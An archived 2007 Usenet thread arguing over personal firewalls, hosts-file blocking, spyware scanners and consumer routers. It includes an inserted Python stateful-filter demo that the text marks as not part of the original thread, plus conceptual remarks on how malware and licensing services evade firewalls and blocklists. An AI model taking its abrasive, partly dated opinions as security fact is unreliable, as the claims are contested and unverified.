> Even NoScript can't make it any less broken. If you really like a
> Mozilla core, take Mozilla SeaMonkey.
>
>> a good AV solution(like NOD32)
>
>
> This is not even a solution at all.
>
>> Spyware Blaster
>
>
> Oh please...
>
>> Spybot Search+Destroy immunization
>
>
> OH PLEASE...
>
>> Turn off Windows Messenger
>
>
> Eh... yeah? Of course, intentionally running an insecure-by-design
> software is never a good idea.
>
You've got my curiosity. What problem do you have with the listed
applications?
And, you mentioned most routers these days aren't in fact firewalls. I'm
fairly certain this Linksys router does indeed have a firewall. Can you
elaborate on what specifically you are calling a firewall?
--
Dustin Cook, Author of BugHunter - MalWare Removal Tool - v2.2d
Email.: bughunter.dustin@gmail.com
Web...: http://bughunter.it-mate.co.uk
Pad...: http://bughunter.it-mate.co.uk/pad.xml
PGP...: http://bughunter.it-mate.co.uk/bughunter.dustin.txt
Re: Jetico Personal Firewall freeware asks way to many questions
am 30.10.2007 22:51:17 von Dustin Cook
"Sebastian G." wrote in
news:5olhodFnfd9dU1@mid.dfncis.de:
> Max M.Wachtel III wrote:
>
>>>> MVPS hosts file
>>>
>>> A very bad start for a proposedly good start. What should this
>>> shit be good for, other than fucking up the system?
>>
>> what???? a good hosts file doesn't f*ckup anything.
>
>
> It does. It slows down the resolver and, in case of Windows, even
> partially breaks it. Aside from that, it's simply superfluous.
>
> Even further, it simply doesn't work, as a normal user doesn't have
> write access to the HOSTS file, and doesn't have the privilege to
> restart the system either - neither would this be reasonable.
On Vista, no. On XP and down, a normal user usually is an administrator
and does have write access by default. You don't need to restart the
system to take advantage. Windows will access the host file anytime it
sees a dns request...*shrug*
>>> This is not even a solution at all.
>> what do you use?
>
>
> A real solution: a global non-exec policy enforced by the kernel.
So you practice safe hex and use a limited account for most of your day
to day tasks right?
> Any added software increases complexity and therefore decreases
> security. Unless it can actually justify this, it is a bad thing.
> Spyware scanners definitely are bad, and this immunization stuff has
> only one purpose: fucking up the system.
I write a spyware scanner, so I'm very interested in why you feel they
are bad?
>> Why do you say anything is broken????
>
>
> Because it usually is. Just like your concept.
Can you explain further please?
--
Dustin Cook, Author of BugHunter - MalWare Removal Tool - v2.2d
Email.: bughunter.dustin@gmail.com
Web...: http://bughunter.it-mate.co.uk
Pad...: http://bughunter.it-mate.co.uk/pad.xml
PGP...: http://bughunter.it-mate.co.uk/bughunter.dustin.txt
Re: Jetico Personal Firewall freeware asks way to many questions
am 31.10.2007 05:10:30 von goarilla
Dustin Cook wrote:
> "Sebastian G." wrote in
> news:5olhodFnfd9dU1@mid.dfncis.de:
>
>> Max M.Wachtel III wrote:
>>
>>>>> MVPS hosts file
>>>> A very bad start for a proposedly good start. What should this
>>>> shit be good for, other than fucking up the system?
>>> what???? a good hosts file doesn't f*ckup anything.
>>
>> It does. It slows down the resolver and, in case of Windows, even
>> partially breaks it. Aside from that, it's simply superfluous.
>>
>> Even further, it simply doesn't work, as a normal user doesn't have
>> write access to the HOSTS file, and doesn't have the privilege to
>> restart the system either - neither would this be reasonable.
>
> On Vista, no. On XP and down, a normal user usually is an administrator
> and does have write access by default. You don't need to restart the
> system to take advantage. Windows will access the host file anytime it
> sees a dns request...*shrug*
>
>>>> This is not even a solution at all.
>>> what do you use?
>>
>> A real solution: a global non-exec policy enforced by the kernel.
>
> So you practice safe hex and use a limited account for most of your day
> to day tasks right?
>
>> Any added software increases complexity and therefore decreases
>> security. Unless it can actually justify this, it is a bad thing.
>> Spyware scanners definitely are bad, and this immunization stuff has
>> only one purpose: fucking up the system.
>
> I write a spyware scanner, so I'm very interested in why you feel they
> are bad?
>
>>> Why do you say anything is broken????
>>
>> Because it usually is. Just like your concept.
>
> Can you explain further please?
>
>
>
>
what's up with this 'practice safe hex' fad ?
Re: Jetico Personal Firewall freeware asks way to many questions
am 31.10.2007 12:25:23 von Sebastian Gottschalk
Dustin Cook wrote:
> I wouldn't outright say a waste of resources, you can use one to keep
> some applications from calling home.. for whatever reason. :)
You'd wish.
Re: Jetico Personal Firewall freeware asks way to many questions
am 31.10.2007 12:29:26 von Sebastian Gottschalk
goarilla wrote:
>> Depends on which systems. Those with higher security margins have a
>> global no-exec policy implemented, thus they simply can't run anything but
>> the preinstalled software, and as long as this is up-to-date an
>> in-memory process compromise of the network is extremely unlikely.
>>
>
> how does one do that ?
> have any concrete information pertaining these security measures ?
On Windows XP and later, it's called "Software Restriction Policy". For
Windows 2000 and NT4 there's "PolicyMaker Application Security", "Antihook
Workstation" or the costly Winternals System Manager.
On Linux and Solaris, it's a simple kernel setting.
> in a perfect world yes
> that's how i do it here
> and well it's not uncommon for malware to use local (root) exploits
> to escalate privilege
After you have successfully implemented such a policy, your focus should
exactly be on privilege escalation vulnerabilities. But don't tell me these
would be inherent and unavoidable.
> huh please explain. do you have some information on how to create
> 'restore images' since when ... i think image i think hardware specific
> root filesystem (windows)
Sysprep
Re: Jetico Personal Firewall freeware asks way to many questions
am 31.10.2007 12:31:56 von Sebastian Gottschalk
s|b wrote:
> I'm quite happy with my system, so there's really no need for you to
> sulk about it...
As long as you unplug it from the internet, I won't complain.
Re: Jetico Personal Firewall freeware asks way to many questions
am 31.10.2007 12:36:13 von Sebastian Gottschalk
Dustin Cook wrote:
> You've got my curiosity. What problem do you have with the listed
> applications?
Beside the obvious?
> And, you mentioned most routers these days aren't in fact firewalls. I'm
> fairly certain this Linksys router does indeed have a firewall.
With a third-party linux-based firmware that allows you full access to the
underlying netfilter/IPTables rules, you can indeed build a firewall with a
Linksys router.
But with just the preinstalled firmware: No, definitely not.
> Can you elaborate on what specifically you are calling a firewall?
A firewall is a concept to separate network segments.
In the current context: A device is a firewall if it's capable to implement
a bridging firewall or a routing firewall.
The minimum requirement for that is that you can refer TCP states (and
probably higher level protocol states for NAT helpers), and for the routing
firewall you should additionally be able to either access the NAT state
table or to have a confluent flow of the packets within the filtering
system with fully qualified flow routing.
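The requirement to "refer TCP states" named in the post above, as an added example that is not part of the original thread: a header-only rule is compared with a filter that keeps a per-connection table. The addresses and the traffic trace are constructed, and the tracker is simplified (no sequence-number checks, FIN handling or timeouts).

```python
"""Minimal TCP state tracking for a routing firewall (constructed traffic)."""
from collections import namedtuple

# outbound=True means the packet travels from the LAN segment to the WAN.
Packet = namedtuple("Packet", "src sport dst dport flags outbound")


def pk(src, sport, dst, dport, flags, outbound):
    """Build a packet; flags are given as e.g. "SYN+ACK"."""
    return Packet(src, sport, dst, dport, frozenset(flags.split("+")), outbound)


def stateless_accept(p):
    """Header-only rule: the LAN may send anything, inbound needs ACK or RST.

    This is the classic stateless approximation of "replies only": it looks
    at one packet's flag bits and has no idea whether a connection exists.
    """
    return p.outbound or bool({"ACK", "RST"} & p.flags)


class StatefulFilter:
    """Accept a packet only if it fits the state of a flow the LAN opened."""

    def __init__(self):
        self.flows = {}  # (lan_ip, lan_port, wan_ip, wan_port) -> state

    @staticmethod
    def _key(p):
        if p.outbound:
            return (p.src, p.sport, p.dst, p.dport)
        return (p.dst, p.dport, p.src, p.sport)

    def accept(self, p):
        key = self._key(p)
        state = self.flows.get(key)
        if state is None:
            # Only a bare SYN from the LAN side may create a flow.
            if p.outbound and p.flags == {"SYN"}:
                self.flows[key] = "SYN_SENT"
                return True
            return False
        if "RST" in p.flags:
            # A reset on a tracked flow tears the entry down.
            del self.flows[key]
            return True
        if state == "SYN_SENT":
            if p.outbound:
                return p.flags == {"SYN"}  # retransmitted SYN
            if p.flags == {"SYN", "ACK"}:
                self.flows[key] = "SYN_RECV"
                return True
            return False
        if state == "SYN_RECV":
            if p.outbound and "ACK" in p.flags and "SYN" not in p.flags:
                self.flows[key] = "ESTABLISHED"
                return True
            # Tolerate a retransmitted SYN+ACK from the server.
            return (not p.outbound) and p.flags == {"SYN", "ACK"}
        # ESTABLISHED: data and ACKs in both directions, but no new SYN.
        return "SYN" not in p.flags


# Constructed trace; all addresses come from documentation/private ranges.
LAN, WEB, OTHER = "192.168.1.10", "203.0.113.5", "198.51.100.7"
TRACE = [
    pk(LAN, 40000, WEB, 80, "SYN", True),        # LAN host opens a connection
    pk(WEB, 80, LAN, 40000, "SYN+ACK", False),   # server answers
    pk(LAN, 40000, WEB, 80, "ACK", True),        # handshake completes
    pk(WEB, 80, LAN, 40000, "ACK+PSH", False),   # reply data
    pk(OTHER, 80, LAN, 40000, "ACK", False),     # ACK with no matching flow
    pk(OTHER, 4444, LAN, 445, "SYN", False),     # inbound connection attempt
    pk(WEB, 80, LAN, 40000, "RST", False),       # server resets the flow
    pk(WEB, 80, LAN, 40000, "ACK", False),       # late packet after the reset
]


def verdicts(accept, trace):
    """Run every packet through an accept() callable, in order."""
    return [accept(p) for p in trace]


if __name__ == "__main__":
    fw = StatefulFilter()
    for p, a, b in zip(TRACE, verdicts(stateless_accept, TRACE),
                       verdicts(fw.accept, TRACE)):
        print(f"{'+'.join(sorted(p.flags)):8} {p.src:>13} -> {p.dst:<13} "
              f"stateless={a!s:5} stateful={b}")
```

Both filters refuse the inbound SYN; they differ only on packets 5 and 8, which carry an ACK bit but belong to no connection the table knows about.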
Re: Jetico Personal Firewall freeware asks way to many questions
am 31.10.2007 12:41:45 von Sebastian Gottschalk
Dustin Cook wrote:
> On XP and down, a normal user usually is an administrator
> and does have write access by default.
When you assume that the user is logged in as an administrator, the entire
discussion about security is void.
> You don't need to restart the
> system to take advantage. Windows will access the host file anytime it
> sees a dns request...*shrug*
It won't reload cached requests though.
> So you practice safe hex and use a limited account for most of your day
> to day tasks right?
Dunno what exactly you mean with safe hex, but surely I won't use
administrative privileges for anything else but administrative tasks.
> I write a spyware scanner, so I'm very interested in why you feel they
> are bad?
As I already mentioned: Complexity is the exact contrary of security.
As for your spyware scanner: What exactly stops me from writing a piece of
malicious software that modifies itself without any detectable pattern? That
works purely by side effects of the API?
>> Because it usually is. Just like your concept.
>
> Can you explain further please?
What he mentioned doesn't even partially address the problem, is based on
horrible assumptions, has horrible side effects and is typically the most
stupid way to achieve the intended.
Re: Jetico Personal Firewall freeware asks way to many questions
am 31.10.2007 12:48:58 von Maximus the Mad
goarilla <"kevin DOT paulus AT skynet DOT be"> after much
thought,came up with this jewel in
news:47280037$0$22317$ba620e4c@news.skynet.be:
> what's up with this 'practice safe hex' fad ?
http://www.claymania.com/safe-hex.html
--
Virus Removal http://max.shplink.com/removal.html
Keep Clean http://max.shplink.com/keepingclean.html
Tools http://max.shplink.com/tools.html
Change nomail.afraid.org to gmail.com to reply by email.
Re: Jetico Personal Firewall freeware asks way to many questions
am 31.10.2007 13:43:29 von Maximus the Mad
"Sebastian G." after much thought,came up with
this jewel in news:5or7vqFo8b6nU1@mid.dfncis.de:
> Dustin Cook wrote:
>
>> On XP and down, a normal user usually is an administrator
>> and does have write access by default.
>
>
> When you assume that the user is logged in as an administrator,
> the entire discussion about security is void.
Out here in the real world,that is what most users do.
>> You don't need to restart the
>> system to take advantage. Windows will access the host file
>> anytime it sees a dns request...*shrug*
>
>
> It won't reload cached requests though.
>
>> So you practice safe hex and use a limited account for most of
>> your day to day tasks right?
>
>
> Dunno what exactly you mean with safe hex,
Safe-Hex
http://www.claymania.com/safe-hex.html
> but surely I won't use
> administrative privileges for anything else but administrative
> tasks.
The average user does not know what administrative privileges are.
>> I write a spyware scanner, so I'm very interested in why you feel
>> they are bad?
>
>
> As I already mentioned: Complexity is the exact contrary of
> security. As for your spyware scanner: What exactly stops me from
> writing a piece of malicious software that modifies itself without
> any detectable pattern? That works purely by side effects of the
> API?
I don't know. What does stop you? Afraid of getting caught perhaps?
>>> Because it usually is. Just like your concept.
>>
>> Can you explain further please?
>
> What he mentioned doesn't even partially address the problem, is
> based on horrible assumptions, has horrible side effects and is
> typically the most stupid way to achieve the intended.
If you look up MVPS hosts file
http://www.mvps.org/winhelp2002/hosts.htm
and scroll down,the page says to "Disable DNS Client" if using
W2K/XP/Vista.
--
Virus Removal http://max.shplink.com/removal.html
Keep Clean http://max.shplink.com/keepingclean.html
Tools http://max.shplink.com/tools.html
Change nomail.afraid.org to gmail.com to reply by email.
Re: Jetico Personal Firewall freeware asks way to many questions
am 31.10.2007 13:56:25 von Sebastian Gottschalk
Maximus the Mad wrote:
>> When you assume that the user is logged in as an administrator,
>> the entire discussion about security is void.
>
> Out here in the real world,that is what most users do.
That doesn't make the discussion at this point any less void.
>
>>> You don't need to restart the
>>> system to take advantage. Windows will access the host file
>>> anytime it sees a dns request...*shrug*
>>
>> It won't reload cached requests though.
>>
>>> So you practice safe hex and use a limited account for most of
>>> your day to day tasks right?
>>
>> Dunno what exactly you mean with safe hex,
>
> Safe-Hex
> http://www.claymania.com/safe-hex.html
As I said: Might be different from my understanding. Just #1 (Install, use
and update anti-virus software) has hardly anything to do with real
security. Even considering to keep on abusing MSIE and MSOE as webbrowser
and mail client under #2 isn't secure either, what's about "# Install a good
firewall"? One should definitely wonder why "Backup your data regularly"
isn't listed as #1...
> I don't know. What does stop you? Afraid of getting caught perhaps?
I meant technically. I can tell you that the bad guy per se isn't afraid to
get caught. As from the user side: Why should I start playing a
cat-and-mouse game where I'm always the loser?
> If you look up MVPS hosts file
> http://www.mvps.org/winhelp2002/hosts.htm
> and scroll down,the page says to "Disable DNS Client" if using
> W2K/XP/Vista.
Which is even more stupid, at least for the given arguments.
But still less stupid than the entire HOSTS file approach.
Re: Jetico Personal Firewall freeware asks way to many questions
am 31.10.2007 14:15:01 von Maximus the Mad
"Sebastian G." after much thought,came up with
this jewel in news:5orcc8Fo7d60U1@mid.dfncis.de:
> Maximus the Mad wrote:
>
>
>>> When you assume that the user is logged in as an administrator,
>>> the entire discussion about security is void.
>>
>> Out here in the real world,that is what most users do.
>
>
> That doesn't make the discussion at this point any less void.
But that is reality.
>
>>
>>>> You don't need to restart the
>>>> system to take advantage. Windows will access the host file
>>>> anytime it sees a dns request...*shrug*
>>>
>>> It won't reload cached requests though.
>>>
>>>> So you practice safe hex and use a limited account for most of
>>>> your day to day tasks right?
>>>
>>> Dunno what exactly you mean with safe hex,
>>
>> Safe-Hex
>> http://www.claymania.com/safe-hex.html
>
>
> As I said: Might be different from my understanding. Just #1
> (Install, use and update anti-virus software) has hardly anything
> to do with real security. Even considering to keep on abusing MSIE
> and MSOE as webbrowser and mail client under #2 isn't secure
> either, what's about "# Install a good firewall"? One should
> definitely wonder why "Backup your data regularly" isn't
> listed as #1...
>
> > I don't know. What does stop you? Afraid of getting caught
> > perhaps?
>
> I meant technically. I can tell you that the bad guy per se isn't
> afraid to get caught. As from the user side: Why should I start
> playing a cat-and-mouse game where I'm always the loser?
I thought that was the idea.
>
>> If you look up MVPS hosts file
>> http://www.mvps.org/winhelp2002/hosts.htm
>> and scroll down,the page says to "Disable DNS Client" if using
>> W2K/XP/Vista.
>
>
> Which is even more stupid, at least for the given arguments.
> But still less stupid than the entire HOSTS file approach.
>
Turning off DNS Client prevents breakage.
--
Virus Removal http://max.shplink.com/removal.html
Keep Clean http://max.shplink.com/keepingclean.html
Tools http://max.shplink.com/tools.html
Change nomail.afraid.org to gmail.com to reply by email.
Re: Jetico Personal Firewall freeware asks way to many questions
am 31.10.2007 15:13:17 von goarilla
Sebastian G. wrote:
> goarilla wrote:
>
>
>>> Depends on which systems. Those with higher security margins have a
>>> global no-exec policy implemented, thus they simply can't run anything
>>> but the preinstalled software, and as long as this is up-to-date an
>>> in-memory process compromise of the network is extremely unlikely.
>>>
>>
>> how does one do that ?
>> have any concrete information pertaining these security measures ?
>
>
> On Windows XP and later, it's called "Software Restriction Policy". For
> Windows 2000 and NT4 there's "PolicyMaker Application Security",
> "Antihook Workstation" or the costly Winternals System Manager.
>
> On Linux and Solaris, it's a simple kernel setting.
>
sysctl?
>> in a perfect world yes
>> that's how i do it here
>> and well it's not uncommon for malware to use local (root) exploits
>> to escalate privilege
>
>
> After you have successfully implemented such a policy, your focus should
> exactly be on privilege escalation vulnerabilities. But don't tell me
> these would be inherent and unavoidable.
>
>> huh please explain. do you have some information on how to create
>> 'restore images' since when ... i think image i think hardware
>> specific root filesystem (windows)
>
>
> Sysprep
Re: Jetico Personal Firewall freeware asks way to many questions
am 31.10.2007 15:56:11 von Dustin Cook
goarilla <"kevin DOT paulus AT skynet DOT be"> wrote in
news:47280037$0$22317$ba620e4c@news.skynet.be:
> Dustin Cook wrote:
>> "Sebastian G." wrote in
>> news:5olhodFnfd9dU1@mid.dfncis.de:
>>
>>> Max M.Wachtel III wrote:
>>>
>>>>>> MVPS hosts file
>>>>> A very bad start for a proposedly good start. What should this
>>>>> shit be good for, other than fucking up the system?
>>>> what???? a good hosts file doesn't f*ckup anything.
>>>
>>> It does. It slows down the resolver and, in case of Windows, even
>>> partially breaks it. Aside from that, it's simply superfluous.
>>>
>>> Even further, it simply doesn't work, as a normal user doesn't have
>>> write access to the HOSTS file, and doesn't have the privilege to
>>> restart the system either - neither would this be reasonable.
>>
>> On Vista, no. On XP and down, a normal user usually is an administrator
>> and does have write access by default. You don't need to restart the
>> system to take advantage. Windows will access the host file anytime it
>> sees a dns request...*shrug*
>>
>>>>> This is not even a solution at all.
>>>> what do you use?
>>>
>>> A real solution: a global non-exec policy enforced by the kernel.
>>
>> So you practice safe hex and use a limited account for most of your day
>> to day tasks right?
>>
>>> Any added software increases complexity and therefore decreases
>>> security. Unless it can actually justify this, it is a bad thing.
>>> Spyware scanners definitely are bad, and this immunization stuff has
>>> only one purpose: fucking up the system.
>>
>> I write a spyware scanner, so I'm very interested in why you feel they
>> are bad?
>>
>>>> Why do you say anything is broken????
>>>
>>> Because it usually is. Just like your concept.
>>
>> Can you explain further please?
>>
>>
>>
>>
>
> what's up with this 'practice safe hex' fad ?
>
It's a neat buzzword? :)
--
Dustin Cook, Author of BugHunter - MalWare Removal Tool - v2.2d
Email.: bughunter.dustin@gmail.com
Web...: http://bughunter.it-mate.co.uk
Pad...: http://bughunter.it-mate.co.uk/pad.xml
PGP...: http://bughunter.it-mate.co.uk/bughunter.dustin.txt
Re: Jetico Personal Firewall freeware asks way to many questions
am 31.10.2007 15:57:42 von Dustin Cook
"Sebastian G." wrote in
news:5or7vqFo8b6nU1@mid.dfncis.de:
> Dustin Cook wrote:
>
>> On XP and down, a normal user usually is an administrator
>> and does have write access by default.
>
>
> When you assume that the user is logged in as an administrator, the
> entire discussion about security is void.
>
>> You don't need to restart the
>> system to take advantage. Windows will access the host file anytime
>> it sees a dns request...*shrug*
>
>
> It won't reload cached requests though.
>
>> So you practice safe hex and use a limited account for most of your
>> day to day tasks right?
>
>
> Dunno what exactly you mean with safe hex, but surely I won't use
> administrative privileges for anything else but administrative tasks.
>
>> I write a spyware scanner, so I'm very interested in why you feel
>> they are bad?
>
>
> As I already mentioned: Complexity is the exact contrary of security.
> As for your spyware scanner: What exactly stops me from writing a
> piece of malicious software that modifies itself without any
> detectable pattern? That works purely by side effects of the API?
I don't dispute that BugHunter is retroactive in what it does, and I
wouldn't want anyone to think they are 100% safe regardless of the
software they use, but I still believe some protection, even if it's
retroactive in nature is better than none.
>>> Because it usually is. Just like your concept.
>>
>> Can you explain further please?
>
> What he mentioned doesn't even partially address the problem, is
> based on horrible assumptions, has horrible side effects and is
> typically the most stupid way to achieve the intended.
>
--
Dustin Cook, Author of BugHunter - MalWare Removal Tool - v2.2d
Email.: bughunter.dustin@gmail.com
Web...: http://bughunter.it-mate.co.uk
Pad...: http://bughunter.it-mate.co.uk/pad.xml
PGP...: http://bughunter.it-mate.co.uk/bughunter.dustin.txt
Re: Jetico Personal Firewall freeware asks way to many questions
am 31.10.2007 16:02:16 von Dustin Cook
"Sebastian G." wrote in
news:5or7lsFo7ldiU1@mid.dfncis.de:
> Dustin Cook wrote:
>
>
>> You've got my curiosity. What problem do you have with the listed
>> applications?
>
>
> Beside the obvious?
I don't know the obvious problems you have with the programs listed,
hence my question. Would you elaborate please?
>> And, you mentioned most routers these days aren't in fact firewalls.
>> I'm fairly certain this Linksys router does indeed have a firewall.
>
>
> With a third-party linux-based firmware that allows you full access to
> the underlying netfilter/IPTables rules, you can indeed build a
> firewall with a Linksys router.
> But with just the preinstalled firmware: No, definitely not.
Okay then. Thanks for answering my question in any event.
>> Can you elaborate on what specifically you are calling a firewall?
>
>
> A firewall is a concept to separate network segments.
> In the current context: A device is a firewall if it's capable to
> implement a bridging firewall or a routing firewall.
My linksys is a routing firewall, sir. I specify the ports I want
redirected inside the lan and it does so. It's not nearly as advanced as
a cisco full fledged router or anything, but it certainly does the job I
ask of it. Keep this computer's ports safe, until/unless I open some.
--
Dustin Cook, Author of BugHunter - MalWare Removal Tool - v2.2d
Email.: bughunter.dustin@gmail.com
Web...: http://bughunter.it-mate.co.uk
Pad...: http://bughunter.it-mate.co.uk/pad.xml
PGP...: http://bughunter.it-mate.co.uk/bughunter.dustin.txt
Re: Jetico Personal Firewall freeware asks way to many questions
am 31.10.2007 16:03:00 von Dustin Cook
"Sebastian G." wrote in news:5or713Fnqrn9U1
@mid.dfncis.de:
> Dustin Cook wrote:
>
>
>> I wouldn't outright say a waste of resources, you can use one to keep
>> some applications from calling home.. for whatever reason. :)
>
> You'd wish.
Unless the application is designed to evade whatever firewall a person
might be using, that's usually how it goes. If you know something I don't,
feel free to share it, we can all learn.
--
Dustin Cook, Author of BugHunter - MalWare Removal Tool - v2.2d
Email.: bughunter.dustin@gmail.com
Web...: http://bughunter.it-mate.co.uk
Pad...: http://bughunter.it-mate.co.uk/pad.xml
PGP...: http://bughunter.it-mate.co.uk/bughunter.dustin.txt
Re: Jetico Personal Firewall freeware asks way to many questions
am 31.10.2007 21:37:37 von private
On Wed, 31 Oct 2007 12:31:56 +0100, Sebastian G. wrote:
> > I'm quite happy with my system, so there's really no need for you to
> > sulk about it...
> As long as you unplug it from the internet, I won't complain.
Then I guess you'll keep on sulking then.
--
s|b
Re: Jetico Personal Firewall freeware asks way to many questions
am 01.11.2007 00:47:14 von Sebastian Gottschalk
Dustin Cook wrote:
>>> I wouldn't outright say a waste of resources, you can use one to keep
>>> some applications from calling home.. for whatever reason. :)
>> You'd wish.
>
> Unless the application is designed to evade whatever firewall a person
> might be using, that's usually how it goes.
If the application isn't malicious, then you don't need to enforce that it
does what exactly it does. On the contrary, if you think that it does
something that it shouldn't do, then you're already considering it as malicious.
> If you know something I don't,
> feel free to share it, we can all learn.
Hm... what about applications seeming non-malicious? A well-known example is
commercial software from Adobe, whereas the Adobe License Manager Service
uses the Raw Sockets API to successfully bypass about any typical "personal
firewall".
Re: Jetico Personal Firewall freeware asks way to many questions
on 01.11.2007 00:53:12 by Sebastian Gottschalk
Maximus the Mad wrote:
>>>> When you assume that the user is logged in as an administrator,
>>>> the entire discussion about security is void.
>>> Out here in the real world,that is what most users do.
>>
>> That doesn't make the discussion at this point any less void.
>
> But that is reality.
And therefore the voidness of this discussion point is reality. Now do you
want to discuss the impossible or could we come back to reasonable
assumptions on how things should be?
>> As from the user side: Why should I start
>> playing a cat-and-mouse game where I'm always the loser?
>
> I thought that was the idea.
The idea of signature-based scanning to address the problem of malicious
software was, as usual, to promote something that on the first run seems to
work even though it actually doesn't, and to get people paying for it. The
lack of education drives this discrepancy even further.
> Turning off DNS Client prevents breakage.
No, it doesn't. Anyway, this is a stupid idea since you're effectively
throwing away a lot of performance for achieving absolutely nothing.
Hint: If you were the bad guy and you'd be running your own server on your
own domain with your own DNS server, how would you avoid single hostnames
being blacklisted? Simply by using wildcards in your zone!
Re: Jetico Personal Firewall freeware asks way to many questions
on 01.11.2007 00:59:08 by Sebastian Gottschalk
Dustin Cook wrote:
> I don't dispute that BugHunter is retroactive in what it does, and I
> wouldn't want anyone to think they are 100% safe regardless of the
> software they use, but I still believe some protection, even if it's
> retroactive in nature is better than none.
Aside from the added complexity and the inability of the user to judge the
output of the mentioned program, what exactly is a shitload of false
positives worth? Say it, f.e., claims that there's some oh-so-bad "tracking
cookie", and as well a trojan horse in user32.dll (because it doesn't match
the original one any more, probably due to a normal update). Now it deletes
both, demands a shutdown, and the system doesn't boot up anymore.
Just try running it over a completely fresh install of Windows, or even over
a well secured system with a lot of known-good third-party software, and the
shame of its report. Same goes for almost any malware scanner under the sun.
Re: Jetico Personal Firewall freeware asks way to many questions
on 01.11.2007 01:21:38 by Sebastian Gottschalk
Dustin Cook wrote:
> "Sebastian G." wrote in
> news:5or7lsFo7ldiU1@mid.dfncis.de:
>
>> Dustin Cook wrote:
>>
>>
>>> You've got my curiosity. What problem do you have with the listed
>>> applications?
>>
>> Beside the obvious?
>
> I don't know the obvious problems you have with the programs listed,
> hence my question. Would you elaborate please?
Firefox: the worst thing you could make out of the Gecko platform
NOD32: virus scanner... highly incomplete approach and high potential for
parsing vulnerabilities and privilege escalation
Spyware Blaster: spyware scanner... totally stupid approach, horrible amount
of false positives, and of course it's too stupid to do a simple unprivileged
task without administrative privileges
Spybot Search+Destroy immunization: aside from cluttering the
HKEY_LOCAL_MACHINE hive full of useless ClassID, it achieves exactly what?
malware authors simply use randomly generated GUIDs or simply
registrationless COM. MSIE still remains fully vulnerable to ActiveX-based
attacks as well as other well-documented security holes^W^W design features,
and real webbrowser simply won't care at all.
Windows Messenger: another documented security hole by design
> My linksys is a routing firewall, sir. I specify the ports I want
> redirected inside the lan and it does so.
So what? Can you specify something like:
queue: prerouting:
route TCP syn from any to me
queue postrouting:
check-state
deny TCP syn from any to me 1-1023
allow TCP syn from any to any keep-state
allow TCP syn,ack from any to me keep-state
allow TCP ack from any to me keep-state
If not, then obviously didn't ask anything that would be sufficient for a
firewall concept yet.
Re: Jetico Personal Firewall freeware asks way to many questions
on 01.11.2007 01:23:38 by Sebastian Gottschalk
s|b wrote:
> On Wed, 31 Oct 2007 12:31:56 +0100, Sebastian G. wrote:
>
>>> I'm quite happy with my system, so there's really no need for you to
>>> sulk about it...
>
>> As long as you unplug it from the internet, I won't complain.
>
> Then I guess you'll keep on sulking then.
But only to your ISP, which might decide to simply disconnect your machine
until you stop it from flooding the internet with spam.
Re: Jetico Personal Firewall freeware asks way to many questions
on 01.11.2007 02:02:41 by Dustin Cook
"Sebastian G." wrote in
news:5osj6pFnsfqvU1@mid.dfncis.de:
> Dustin Cook wrote:
>
>
>> I don't dispute that BugHunter is retroactive in what it does, and I
>> wouldn't want anyone to think they are 100% safe regardless of the
>> software they use, but I still believe some protection, even if it's
>> retroactive in nature is better than none.
>
>
> Aside from the added complexity and the inability of the user to judge
> the output of the mentioned program, what exactly is a shitload of
> false positives worth? Say it, f.e., claims that there's some
> oh-so-bad "tracking cookie", and as well a trojan horse in user32.dll
> (because it doesn't match the original one any more, probably due to a
> normal update). Now it deletes both, demands a shutdown, and the
> system doesn't boot up anymore.
Hmm. While I don't dispute the fact that BugHunter has suffered from
false positives in the past, I'm unaware of any serious windows dlls
being targeted by accident. I don't believe you've actually examined the
program tho, as you're assuming it bothers with cookies; and is interested
in files that have changed. It's not interested in either of those, and
its documentation clearly does state what it scans for, and what it
ignores.
> Just try running it over a completely fresh install of Windows, or
> even over a well secured system with a lot of known-good third-party
> software, and the shame of its report. Same goes for almost any
> malware scanner under the sun.
I have, numerous times in development and testing. I fix the false alarms
as I find them, but like I said, it doesn't flag on.. "shitloads" and
doesn't find anything on a freshly loaded box. This machine is here a
fairly decent example of 3rd party apps, it has tons, including various
programming languages for dos and windows. Guess what? No false alarms on
those executables either. :)
Have you actually examined the program I mentioned yourself? I ask this
because BugHunter doesn't do the things you mention, and you seem to
imply that it's a danger to a users system. I'd like to clear that
misunderstanding up.
--
Dustin Cook, Author of BugHunter - MalWare Removal Tool - v2.2d
Email.: bughunter.dustin@gmail.com
Web...: http://bughunter.it-mate.co.uk
Pad...: http://bughunter.it-mate.co.uk/pad.xml
PGP...: http://bughunter.it-mate.co.uk/bughunter.dustin.txt
Re: Jetico Personal Firewall freeware asks way to many questions
on 01.11.2007 02:07:42 by Dustin Cook
"Sebastian G." wrote in
news:5oskh0FocibuU1@mid.dfncis.de:
> Dustin Cook wrote:
>
>> "Sebastian G." wrote in
>> news:5or7lsFo7ldiU1@mid.dfncis.de:
>>
>>> Dustin Cook wrote:
>>>
>>>
>>>> You've got my curiosity. What problem do you have with the listed
>>>> applications?
>>>
>>> Beside the obvious?
>>
>> I don't know the obvious problems you have with the programs listed,
>> hence my question. Would you elaborate please?
>
>
> Firefox: the worst thing you could make out of the Gecko platform
Examples please?
> NOD32: virus scanner... highly incomplete approach and high potential
> for parsing vulnerabilities and privilege escalation
NOD32 is considered one of the best engines available, Would you mind
explaining further these issues you have with it?
> Spyware Blaster: spyware scanner... totally stupid approach, horrible
> amount of false positives, and of course it's too stupid to do a simple
> unprivileged task without administrative privileges
Spyware Blaster...isn't a scanner, at all. How can it get any false
positives sir? It doesn't scan for anything. And, it can't do its thing
without admin rights, due to the registry keys which have to be modified.
That's a good thing. I wouldn't want a program being able to set those
keys if I was on the guest account. :)
> Spybot Search+Destroy immunization: aside from cluttering the
> HKEY_LOCAL_MACHINE hive full of useless ClassID, it achieves exactly
> what? malware authors simply use randomly generated GUIDs or simply
Blocks installation of older malware applications with GUID's that are
already known and used.
> registrationless COM. MSIE still remains fully vulnerable to
I certainly don't dispute the security risks present with MSIE. :)
> all. Windows Messenger: another documented security hole by design
I've never been a fan of windows messenger either, sir.
>
>> My linksys is a routing firewall, sir. I specify the ports I want
>> redirected inside the lan and it does so.
>
>
> So what? Can you specify something like:
>
> queue: prerouting:
> route TCP syn from any to me
> queue postrouting:
> check-state
> deny TCP syn from any to me 1-1023
> allow TCP syn from any to any keep-state
> allow TCP syn,ack from any to me keep-state
> allow TCP ack from any to me keep-state
Nope, I certainly can't.
> If not, then obviously didn't ask anything that would be sufficient
> for a firewall concept yet.
I asked you specifically what you felt was a firewall, I didn't ask for a
trolling response. :) And I thank you for the time you spent responding
to me.
--
